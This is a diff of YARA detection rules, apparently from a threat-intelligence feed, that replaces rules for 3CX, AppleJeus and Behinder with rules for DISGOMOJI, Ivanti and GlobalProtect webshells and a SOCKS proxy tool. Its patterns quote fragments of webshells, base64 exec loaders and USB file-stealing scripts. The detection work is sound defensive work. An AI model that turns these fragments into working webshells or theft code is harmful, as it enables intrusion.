-                        46 8A 94 0C ?? ?? ?? ??
-                        45 00 D0
-                        45 0F B6 D8
-                        42 8A AC 1C ?? ?? ?? ??
-                        46 88 94 1C ?? ?? ?? ??
-                        42 88 AC 0C ?? ?? ?? ??
-                        42 02 AC 1C ?? ?? ?? ??
-                        44 0F B6 CD
-                        46 8A 8C 0C ?? ?? ?? ??
-                        45 30 0C 0E
-                        48 FF C1
-                        48 39 C8
-                        75 ??
-                }
+		$s1 = "Session *%s* opened!" wide ascii
+		$s2 = "uevent_seqnum.sh" wide ascii
+		$s3 = "Error downloading shell script: %v" wide ascii
+		$s4 = "Error setting execute permissions: %v" wide ascii
+		$s5 = "Error executing shell script: %v" wide ascii
+		$s6 = "Error creating Discord session" wide ascii
 
 	condition:
-		all of them
+		4 of them
 }
-rule VOLEXITY_Informational_Win_3Cx_Msi : UTA0040
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Bogus_Strings : TRANSPARENTJASMINE FILE
 {
 	meta:
-		description = "Detects 3CX installers created in March 2023, 3CX was known to be compromised at this time."
+		description = "Detects the DISGOMOJI malware using bogus strings introduced in the newer version."
 		author = "threatintel@volexity.com"
-		id = "ac26e7b1-61eb-5074-bcda-46d714bdba4c"
-		date = "2023-03-30"
-		modified = "2023-03-30"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L134-L152"
+		id = "ecff8d3c-d4fe-5b6d-a227-6ff531cf8e2b"
+		date = "2024-03-14"
+		modified = "2024-07-05"
+		reference = "TIB-20240318"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L132-L159"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "c04de2653ef587f27c7ebf058c6f6c345e16b67f36ccc4306bc49f8c4394728e"
+		logic_hash = "0d8a2b371ffb182e60a8cc0cc500d1a9f906718a55f23f35f6c12f7faabbe971"
 		score = 75
 		quality = 80
-		tags = "UTA0040"
-		hash1 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		memory_suitable = 0
+		tags = "TRANSPARENTJASMINE, FILE"
+		hash1 = "8c8ef2d850bd9c987604e82571706e11612946122c6ab089bd54440c0113968e"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10341
+		version = 5
 
 	strings:
-		$cert = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
-		$app = "3CXDesktopApp.exe"
-		$data = "202303"
+		$s1 = "Graphics Display Rendering" wide ascii
+		$s2 = "Error fetching Repository Key: %v" wide ascii
+		$s3 = "Error reading Repository Key: %v" wide ascii
+		$s4 = "Error fetching dpkg: %v" wide ascii
+		$s5 = "GNU Drivers Latest version v1.4.2" wide ascii
+		$s6 = "ps_output.txt" wide ascii
 
 	condition:
 		all of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_Oct22 : LAZYPINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Uevent_Seqnum : TRANSPARENTJASMINE FILE
 {
 	meta:
-		description = "Detects AppleJeus DLL samples."
+		description = "Detects a script deployed as part of DISGOMOJI malware chain."
 		author = "threatintel@volexity.com"
-		id = "f88e2253-e296-57d8-a627-6cb4ccff7a92"
-		date = "2022-11-03"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L1-L22"
+		id = "9df61164-6a92-5042-ba4f-64dc7e998283"
+		date = "2024-03-07"
+		modified = "2024-07-05"
+		reference = "TIB-20240318"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L160-L187"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "46f3325a7e8e33896862b1971f561f4871670842aecd46bcc7a5a1af869ecdc4"
+		logic_hash = "e390e83d9fc15499c9f32ad47d1c526273105602bda7b3532720b0a3f6abc835"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE, MEMORY"
-		hash1 = "82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629"
-		os = "win"
+		tags = "TRANSPARENTJASMINE, FILE"
+		hash1 = "98b24fb7aaaece7556aea2269b4e908dd79ff332ddaa5111caec49123840f364"
+		os = "linux"
 		os_arch = "all"
-		scan_context = "file,memory"
+		scan_context = "file"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8495
-		version = 3
+		rule_id = 10314
+		version = 6
 
 	strings:
-		$s1 = "HijackingLib.dll" ascii
+		$s1 = "USB_DIR=\"/media/$USER\"" wide ascii
+		$s2 = "RECORD_FILE=\"record.txt\"" wide ascii
+		$s3 = "copy_files()" wide ascii
+		$s4 = "Check for connected USB drives" wide ascii
+		$s5 = "Check if filename already exists in record.txt" wide ascii
+		$s6 = "Function to copy files from USB drive to destination folder" wide ascii
 
 	condition:
-		$s1
+		3 of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_B_Oct22 : LAZYPINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Lan_Conf : TRANSPARENTJASMINE FILE
 {
 	meta:
-		description = "Detects unpacked AppleJeus samples."
+		description = "Detects a script deployed as part of DISGOMOJI malware chain."
 		author = "threatintel@volexity.com"
-		id = "8586dc64-225b-5f28-a6d6-b9b6e8f1c815"
-		date = "2022-11-03"
-		modified = "2025-05-21"
-		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L24-L54"
+		id = "b338b3cf-22ce-5767-bdea-503e883bc84b"
+		date = "2024-03-07"
+		modified = "2024-07-05"
+		reference = "TIB-20240318"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L188-L215"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "76f3c9692ea96d3cadbbcad03477ab6c53445935352cb215152b9b5483666d43"
+		logic_hash = "2a19d5cff7adc9b1b92538a5df4e3cadea694f925f65080f5093fc5425e840f4"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE, MEMORY"
-		hash1 = "9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78"
-		os = "win"
+		tags = "TRANSPARENTJASMINE, FILE"
+		hash1 = "0b5cf9bd917f0af03dd694ff4ce39b0b34a97c9f41b87feac1dc884a684f60ef"
+		os = "linux"
 		os_arch = "all"
-		scan_context = "file,memory"
+		scan_context = "file"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8497
-		version = 5
+		rule_id = 10312
+		version = 7
 
 	strings:
-		$key1 = "AppX7y4nbzq37zn4ks9k7amqjywdat7d"
-		$key2 = "Gd2n5frvG2eZ1KOe"
-		$str1 = "Windows %d(%d)-%s"
-		$str2 = "&act=check"
+		$s1 = "add_lan_conf_cron_if_not_exists" wide ascii
+		$s2 = "download_if_not_exists" wide ascii
+		$s3 = "add_cron_if_not_exists" wide ascii
+		$s4 = "uevent_seqnum.sh" wide ascii
+		$s5 = "$HOME/.x86_64-linux-gnu" wide ascii
+		$s6 = "lanConfScriptPath" wide ascii
 
 	condition:
-		( any of ( $key* ) and 1 of ( $str* ) ) or all of ( $str* )
+		4 of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_C_Oct22 : LAZYPINE MEMORY
+rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy_1 : FILE MEMORY
 {
 	meta:
-		description = "Detects unpacked AppleJeus samples."
+		description = "Detects a opensource malware available on github using strings in the binary. The DISGOMOJI malware family used by TransparentJasmine is based on this malware."
 		author = "threatintel@volexity.com"
-		id = "c9cbddde-220c-5e26-8760-85c29b98bfeb"
-		date = "2022-11-03"
-		modified = "2023-09-28"
-		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L57-L84"
+		id = "6816d264-4311-5e90-948b-2e27cdf0b720"
+		date = "2024-03-28"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L216-L243"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "a9e635d9353c8e5c4992beba79299fb889a7a3d5bc3eaf191f8bb7f51258a6c6"
+		logic_hash = "22b3e5109d0738552fbc310344b2651ab3297e324bc883d5332c1e8a7a1df29b"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, MEMORY"
-		hash1 = "a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb"
-		os = "win"
+		tags = "FILE, MEMORY"
+		hash1 = "de32e96d1f151cc787841c12fad88d0a2276a93d202fc19f93631462512fffaf"
+		os = "all"
 		os_arch = "all"
-		scan_context = "memory"
-		severity = "critical"
+		scan_context = "file,memory"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8519
+		rule_id = 10390
 		version = 3
 
 	strings:
-		$str1 = "%sd.e%sc \"%s > %s 2>&1\"" wide
-		$str2 = "tuid"
-		$str4 = "payload"
-		$str5 = "fconn"
-		$str6 = "Mozilla_%lu"
+		$s1 = "File is bigger than 8MB" wide ascii
+		$s2 = "Uploaded file to" wide ascii
+		$s3 = "sess-%d" wide ascii
+		$s4 = "Session *%s* opened" wide ascii
+		$s5 = "%s%d_%dx%d.png" wide ascii
 
 	condition:
-		5 of ( $str* )
+		4 of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_D_Oct22 : LAZYPINE FILE MEMORY
+rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy : FILE MEMORY
 {
 	meta:
-		description = "Detected AppleJeus unpacked samples."
+		description = "Detects a opensource malware available on github using strings in the binary. DISGOMOJI used by TransparentJasmine is based on this malware."
 		author = "threatintel@volexity.com"
-		id = "80d2821b-a437-573e-9e9d-bf79f9422cc9"
-		date = "2022-11-10"
-		modified = "2025-05-21"
-		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L87-L112"
+		id = "1ddbf476-ba2d-5cbb-ad95-38e0ae8db71b"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "https://github.com/bmdyy/discord-c2"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L244-L267"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "23c0642e5be15a75a39d089cd52f2f14d633f7af6889140b9ec6e53c5c023974"
+		logic_hash = "38b860a43b9937351f74b01983888f18ad101cbe66560feb7455d46b713eba0f"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE, MEMORY"
-		hash1 = "a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379"
-		os = "win"
+		tags = "FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8534
-		version = 3
+		rule_id = 10264
+		version = 12
 
 	strings:
-		$reg = "Software\\Bitcoin\\Bitcoin-Qt"
-		$pattern = "%s=%d&%s=%s&%s=%s&%s=%d"
-		$exec = " \"%s\", RaitingSetupUI "
-		$http = "Accept: */*" wide
+		$s1 = "**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**" wide ascii
 
 	condition:
-		all of them
+		$s1
 }
-rule VOLEXITY_Apt_Delivery_Macro_Lazypine_Jeus_B : LAZYPINE FILE
+rule VOLEXITY_Apt_Webshell_Pl_Complyshell : UTA0178 FILE MEMORY
 {
 	meta:
-		description = "Detects macros used by the LazyPine threat actor to distribute AppleJeus."
+		description = "Detection for the COMPLYSHELL webshell."
 		author = "threatintel@volexity.com"
-		id = "ac4d4e82-e29f-5134-999d-b8dcef59d285"
-		date = "2022-11-03"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L114-L139"
+		id = "6b44b5bc-a75f-573c-b9c3-562b7874e408"
+		date = "2023-12-13"
+		modified = "2024-01-12"
+		reference = "TIB-20231215"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L3-L25"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "e55199e6ad26894f98e930cd4716127ee868872d08ada1c44675e4db1ec27894"
+		logic_hash = "ff46691f1add20cff30fe996e2fb199ce42408e86d5642a8a43c430f2245b1f5"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE"
-		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
-		os = "win"
+		tags = "UTA0178, FILE, MEMORY"
+		hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2"
+		os = "linux"
 		os_arch = "all"
-		scan_context = "file"
+		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8493
-		version = 3
+		rule_id = 9995
+		version = 4
 
 	strings:
-		$a1 = ", vbDirectory) = \"\" Then" ascii
-		$a2 = ".Caption & " ascii
-		$a3 = ".nodeTypedValue" ascii
-		$a4 = ".Application.Visible = False" ascii
-		$a5 = " MkDir (" ascii
+		$s = "eval{my $c=Crypt::RC4->new("
 
 	condition:
-		all of ( $a* )
+		$s
 }
-rule VOLEXITY_Apt_Delivery_Office_Macro_Lazypine_Jeus : LAZYPINE FILE
+
+rule VOLEXITY_Apt_Webshell_Aspx_Glasstoken : UTA0178 FILE MEMORY
 {
 	meta:
-		description = "Detects malicious documents used by LazyPine in a campaign dropping the AppleJeus malware."
+		description = "Detection for a custom webshell seen on Exchange server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code."
 		author = "threatintel@volexity.com"
-		id = "f9a92f47-aa1d-56ea-ac59-47cc559f379f"
-		date = "2022-11-02"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L141-L165"
+		id = "2f07748a-a52f-5ac7-9d3e-50fd3ecea271"
+		date = "2023-12-12"
+		modified = "2024-09-30"
+		reference = "TIB-20231215"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L26-L52"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "54d5396b889a45d81122301eadf77f73135937fbe9647ad60491ac7856faf5ad"
+		logic_hash = "6b8183ac1e87a86c58760db51f767ed278cc0c838ed89e7435af7d0373e58b26"
 		score = 75
-		quality = 80
-		tags = "LAZYPINE, FILE"
-		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
-		os = "all"
+		quality = 30
+		tags = "UTA0178, FILE, MEMORY"
+		hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d"
+		os = "win"
 		os_arch = "all"
-		scan_context = "file"
+		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8490
-		version = 7
+		rule_id = 9994
+		version = 6
 
 	strings:
-		$s1 = "0M8R4K" ascii
-		$s2 = "bin.base64" ascii
-		$s3 = "dragon" ascii
-		$s4 = "Workbook_Open" ascii
+		$s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii
+		$re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/
 
 	condition:
-		all of ( $s* )
+		for any i in ( 0 .. math.min ( #s1 , 100 ) ) : ( $re in ( @s1 [ i ] .. @s1 [ i ] + 512 ) )
 }
-rule VOLEXITY_Apt_Malware_Js_Sharpext : SHARPPINE FILE MEMORY
+rule VOLEXITY_Webshell_Aspx_Regeorg : FILE MEMORY
 {
 	meta:
-		description = "A malicious Chrome browser extension used by the SharpPine threat actor to steal Gmail data from a victim."
+		description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg."
 		author = "threatintel@volexity.com"
-		id = "61b5176a-ff73-5fce-bc70-c9e09bb5afed"
-		date = "2021-09-14"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-07-28 SharpTongue SharpTongue Deploys Clever Mail-Stealing Browser Extension SHARPEXT/yara.yar#L1-L52"
+		id = "02365a30-769e-5c47-8d36-a79608ffd121"
+		date = "2018-08-29"
+		modified = "2024-01-09"
+		reference = "TIB-20231215"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L53-L86"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "0ed58c8646582ee36aeac650fac02d1e4962d45c0f6a24783c021d9267bed192"
+		hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988"
+		logic_hash = "4fed023e85a32052917f6db1e2e155c91586538938c03acc59f200a8264888ca"
 		score = 75
 		quality = 80
-		tags = "SHARPPINE, FILE, MEMORY"
-		hash1 = "1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00"
-		hash2 = "6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4"
-		hash3 = "6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c"
-		os = "all"
+		tags = "FILE, MEMORY"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5916
-		version = 5
+		rule_id = 410
+		version = 7
 
 	strings:
-		$s1 = "\"mode=attach&name=\"" ascii
-		$s2 = "\"mode=new&mid=\"" ascii
-		$s3 = "\"mode=attlist\"" ascii
-		$s4 = "\"mode=list\"" ascii
-		$s5 = "\"mode=domain\"" ascii
-		$s6 = "\"mode=black\"" ascii
-		$s7 = "\"mode=newD&d=\"" ascii
-		$mark1 = "chrome.runtime.onMessage.addListener" ascii
-		$mark2 = "chrome.webNavigation.onCompleted.addListener" ascii
-		$enc1 = "function BSue(string){" ascii
-		$enc2 = "function BSE(input){" ascii
-		$enc3 = "function bin2hex(byteArray)" ascii
-		$xhr1 = ".send(\"mode=cd1" ascii
-		$xhr2 = ".send(\"mode=black" ascii
-		$xhr3 = ".send(\"mode=domain" ascii
-		$xhr4 = ".send(\"mode=list" ascii
-		$manifest1 = "\"description\":\"advanced font\"," ascii
-		$manifest2 = "\"scripts\":[\"bg.js\"]" ascii
-		$manifest3 = "\"devtools_page\":\"dev.html\"" ascii
+		$a1 = "every office needs a tool like Georg" ascii
+		$a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii
+		$a3 = "exKak.Message" ascii
+		$proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")"
+		$proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii
+		$proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii
+		$proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii
 
 	condition:
-		(5 of ( $s* ) and all of ( $mark* ) ) or all of ( $enc* ) or 3 of ( $xhr* ) or 2 of ( $manifest* )
+		any of ( $a* ) or $proxy1 or all of ( $proxy_b* )
 }
-rule VOLEXITY_Webshell_Jsp_Converge : FILE MEMORY CVE_2022_26134
+rule VOLEXITY_Hacktool_Py_Pysoxy : FILE MEMORY
 {
 	meta:
-		description = "Detects CONVERGE - a file upload webshell observed in incident involving compromise of Confluence server via CVE-2022-26134."
+		description = "SOCKS5 proxy tool used to relay connections."
 		author = "threatintel@volexity.com"
-		id = "2a74678e-cb00-567c-a2e0-2e095f3e5ee8"
-		date = "2022-06-01"
-		modified = "2024-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L1-L21"
+		id = "88094b55-784d-5245-9c40-b1eebf0e6e72"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "TIB-20240109"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L87-L114"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "bb48516342eddd48c35e6db0eb74f95e116dc723503552b99ba721b5bdb391e5"
+		logic_hash = "f73e9d3c2f64c013218469209f3b69fc868efafc151a7de979dde089bfdb24b2"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY, CVE-2022-26134"
+		tags = "FILE, MEMORY"
+		hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb"
 		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6788
-		version = 5
+		rule_id = 10065
+		version = 3
 
 	strings:
-		$s1 = "if (request.getParameter(\"name\")!=null && request.getParameter(\"name\").length()!=0){" ascii
+		$s1 = "proxy_loop" ascii
+		$s2 = "connect_to_dst" ascii
+		$s3 = "request_client" ascii
+		$s4 = "subnegotiation_client" ascii
+		$s5 = "bind_port" ascii
 
 	condition:
-		$s1
+		all of them
 }
-rule VOLEXITY_Webshell_Java_Realcmd : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Py_Upstyle : UTA0218 FILE MEMORY
 {
 	meta:
-		description = "Detects the RealCMD webshell, one of the payloads for BEHINDER."
+		description = "Detect the UPSTYLE webshell."
 		author = "threatintel@volexity.com"
-		id = "60b30ccc-bcfa-51e6-a3f5-88037d19213e"
-		date = "2022-06-01"
-		modified = "2024-07-30"
-		reference = "https://github.com/Freakboy/Behinder/blob/master/src/main/java/vip/youwe/sheller/payload/java/RealCMD.java"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L61-L84"
+		id = "45726f35-8b3e-5095-b145-9e7f6da6838b"
+		date = "2024-04-11"
+		modified = "2024-04-12"
+		reference = "TIB-20240412"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L1-L34"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "e09f2a23674fd73296dd4d1fabf1a2c812bfe69ff02abc96a4be35af6a18e512"
+		logic_hash = "51923600b23d23f4ce29eac7f5ab9f7e1ddb45bed5f6727ddec4dcb75872e473"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "a9a30455d6f3a0a8cd0274ae954aa41674b6fd52877fafc84a9cb833fd8858f6"
-		os = "all"
+		tags = "UTA0218, FILE, MEMORY"
+		hash1 = "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac"
+		hash2 = "0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8"
+		hash3 = "4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6786
-		version = 4
+		rule_id = 10429
+		version = 2
 
 	strings:
-		$fn1 = "runCmd" wide ascii fullword
-		$fn2 = "RealCMD" ascii wide fullword
-		$fn3 = "buildJson" ascii wide fullword
+		$stage1_str1 = "/opt/pancfg/mgmt/licenses/PA_VM"
+		$stage1_str2 = "exec(base64."
+		$stage2_str1 = "signal.signal(signal.SIGTERM,stop)"
+		$stage2_str2 = "exec(base64."
+		$stage3_str1 = "write(\"/*\"+output+\"*/\")"
+		$stage3_str2 = "SHELL_PATTERN"
 
 	condition:
-		all of ( $fn* )
+		all of ( $stage1* ) or all of ( $stage2* ) or all of ( $stage3* )
 }
-rule VOLEXITY_Webshell_Java_Behinder_Shellservice : FILE MEMORY
+rule VOLEXITY_Susp_Any_Jarischf_User_Path : FILE MEMORY
 {
 	meta:
-		description = "Looks for artifacts generated (generally seen in .class files) related to the Behinder webshell."
+		description = "Detects paths embedded in samples in released projects written by Ferdinand Jarisch, a pentester in AISEC. These tools are sometimes used by attackers in real world intrusions."
 		author = "threatintel@volexity.com"
-		id = "21c1e3e9-d048-5c60-9c21-8e54b27f359a"
-		date = "2022-03-18"
-		modified = "2024-07-30"
-		reference = "https://github.com/MountCloud/BehinderClientSource/blob/master/src/main/java/net/rebeyond/behinder/core/ShellService.java"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L1-L29"
+		id = "062a6fdb-c516-5643-9c7c-deff32eeb95e"
+		date = "2024-04-10"
+		modified = "2024-04-15"
+		reference = "TIB-20240412"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L59-L81"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "373a8d4ef81e9bbbf1f24ebf0389e7da4b73f88786cc8e1d286ccc9f4c36debc"
-		score = 75
-		quality = 30
+		logic_hash = "574d5b1fadb91c39251600e7d73d4993d4b16565bd1427a0e8d6ed4e7905ab54"
+		score = 50
+		quality = 80
 		tags = "FILE, MEMORY"
-		hash1 = "9a9882f9082a506ed0fc4ddaedd50570c5762deadcaf789ac81ecdbb8cf6eff2"
-		os = "win,linux"
+		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "critical"
+		severity = "high"
